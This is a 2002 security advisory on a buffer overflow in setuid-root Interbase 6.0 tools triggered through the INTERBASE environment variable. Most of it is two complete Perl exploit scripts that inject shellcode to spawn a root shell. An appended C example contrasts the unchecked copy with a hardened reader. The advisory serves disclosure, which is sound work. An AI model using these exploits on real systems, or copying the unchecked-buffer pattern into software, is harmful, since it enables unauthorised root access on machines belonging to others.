Interbase heap corruption issue

Published: 2002-06-19
Updated: 2002-06-19
Severity: High
Threat: Local administrator (root) privileges
Error type: Boundary check error
Exploitation: Server mode

Affected systems

interbase-6.0-1.i386.rpm

Detailed description

Several tools in the interbase-6.0-1.i386.rpm package are installed SETUID root:

/usr/local/interbase/bin/gds_drop
/usr/local/interbase/bin/gds_inet_server
/usr/local/interbase/bin/gds_lock_mgr

They contain a flaw in the way the "INTERBASE" environment variable is read, which leads to a buffer overflow and can be used to obtain root privileges.

Test code

#!/usr/bin/perl -w
#
# gds_drop exploit for Interbase 6.0 linux beta
#
# - tested on redhat 7.2
#
# - Developed in the Snosoft Cerebrum test labs
# - (http://www.snosoft.com) - overflow found by KF
#
# coded by stripey - 15/06/2002 (stripey@snosoft.com)
#

# optional address offset from the command line, default 0
($offset) = @ARGV,$offset || ($offset = 0);

$sc = "\x90"x512;
$sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80";
$sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b";
$sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd";
$sc .= "\x80\xe8\xdc\xff\xff\xff/bin/sh";

$ENV{"FOO"} = $sc;

# over-long INTERBASE value that overruns the fixed-size buffer
$buf = pack("l",(0xbffffdc0+$offset))x86;
$buf .= "A";

$ENV{"INTERBASE"} = $buf;

exec("/usr/local/interbase/bin/gds_drop");


#!/usr/bin/perl -w
#
# gds_lock_mgr exploit for Interbase 6.0 linux beta
#
# - tested on redhat 7.2
#
# - Developed in the Snosoft Cerebrum test labs
# - (http://www.snosoft.com) - overflow found by KF
#
# Note: We cannot attach to an interactive shell so it
# will execute /tmp/sh instead...
#
# coded by stripey - 15/06/2002 (stripey@snosoft.com)
#

# optional address offset from the command line, default 0
($offset) = @ARGV,$offset || ($offset = 0);

$sc = "\x90"x512;
$sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80";
$sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b";
$sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd";
$sc .= "\x80\xe8\xdc\xff\xff\xff/tmp/sh";

$ENV{"FOO"} = $sc;

# over-long INTERBASE value that overruns the fixed-size buffer
$buf = pack("l",(0xbffffdc0+$offset))x86;
$buf .= "A";

$ENV{"INTERBASE"} = $buf;

exec("/usr/local/interbase/bin/gds_lock_mgr");

Solution

None yet.

Related information

KF (dotslash@snosoft.com)

Reference: http://archives.neohapsis.com/archives/bugtraq/2002-06/0206.html
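The defect class described above, as an added example that is not the advisory's or Interbase's own code: a fixed-size buffer filled from the INTERBASE environment variable with no length check, next to a hardened reader a setuid root binary could use instead. DIR_BUF, INTERBASE_DEFAULT_DIR, read_interbase_dir and the 400-byte sample value are assumptions constructed for this example.

```c
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define DIR_BUF 256
/* Assumed compiled-in default; not taken from Interbase's sources. */
#define INTERBASE_DEFAULT_DIR "/usr/local/interbase"

/* Vulnerable shape: the value of INTERBASE lands in a fixed buffer with
 * no length check, so any value of DIR_BUF bytes or more writes past dst.
 * Kept only for contrast with the hardened reader below. */
void copy_env_unchecked(char dst[DIR_BUF], const char *value)
{
    strcpy(dst, value);
}

/* Hardened reader. ruid/euid are parameters so the policy is testable.
 * Returns 1 when the environment value was accepted, 0 when the built-in
 * default was used, -1 when the value was rejected (dst left untouched). */
int read_interbase_dir(const char *value, uid_t ruid, uid_t euid,
                       char *dst, size_t dstlen)
{
    /* A setuid binary (real uid != effective uid) must not let an
     * unprivileged caller steer it via the environment: use the default. */
    if (ruid != euid || value == NULL || value[0] == '\0') {
        snprintf(dst, dstlen, "%s", INTERBASE_DEFAULT_DIR);
        return 0;
    }
    /* The terminator must appear within dstlen bytes, else it cannot fit. */
    const char *end = memchr(value, '\0', dstlen);
    if (end == NULL || value[0] != '/')   /* too long, or not absolute */
        return -1;
    size_t n = (size_t)(end - value);
    memcpy(dst, value, n + 1);
    return 1;
}

/* Constructed oversized value (400 bytes), comparable to the one the
 * advisory's test script places in INTERBASE; the reader must refuse it. */
int demo_oversized(void)
{
    char value[400], dst[DIR_BUF];
    memset(value, 'A', sizeof value - 1);
    value[0] = '/';
    value[sizeof value - 1] = '\0';
    return read_interbase_dir(value, 0, 0, dst, sizeof dst);
}
```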